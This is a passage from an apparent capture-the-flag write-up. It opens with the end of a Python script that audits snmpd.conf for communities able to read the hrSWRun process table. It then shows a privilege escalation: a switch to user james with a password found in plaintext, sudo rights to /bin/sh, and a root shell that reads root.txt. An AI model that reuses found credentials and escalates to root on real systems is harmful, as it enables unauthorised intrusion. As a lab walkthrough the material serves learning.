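            groups.setdefault(tok[3], []).append((tok[1], tok[2]))
        elif kw == "view" and tok[2] == "included":
            views.setdefault(tok[1], []).append(tok[3])
        elif kw == "access":                  # group, model, level, readview
            access.append((tok[1], tok[3], tok[4], tok[6]))
        elif kw not in IGNORED:
            findings.append(f"unknown directive (ignored by snmpd): {tok[0]}")
    for secname, community in com2sec.items():
        for group, model in groups.get(secname, []):
            for agroup, amodel, level, readview in access:
                if agroup != group or amodel not in (model, "any"):
                    continue
                for oid in views.get(readview, []):
                    if oid_covers(oid, HR_SW_RUN):
                        findings.append(
                            f"community '{community}' ({model}, {level}) reads "
                            f"view {readview} ({oid}), which covers hrSWRun")
    return findings


if __name__ == "__main__":
    for finding in audit_snmpd_conf(SAMPLE_SNMPD_CONF):
        print("-", finding)
```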
## su as james

```sh
svc@mentor:/etc/snmp$ su james
Password: SuperSecurePassword123__
```

## sudo
```sh
james@mentor:~$ sudo -l
[sudo] password for james:
Matching Defaults entries for james on mentor:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User james may run the following commands on mentor:
    (ALL) /bin/sh
```
```sh
james@mentor:~$ sudo /bin/sh
# whoami
root
```

## root.txt
```sh
# cat /root/root.txt
2477fb6b...
```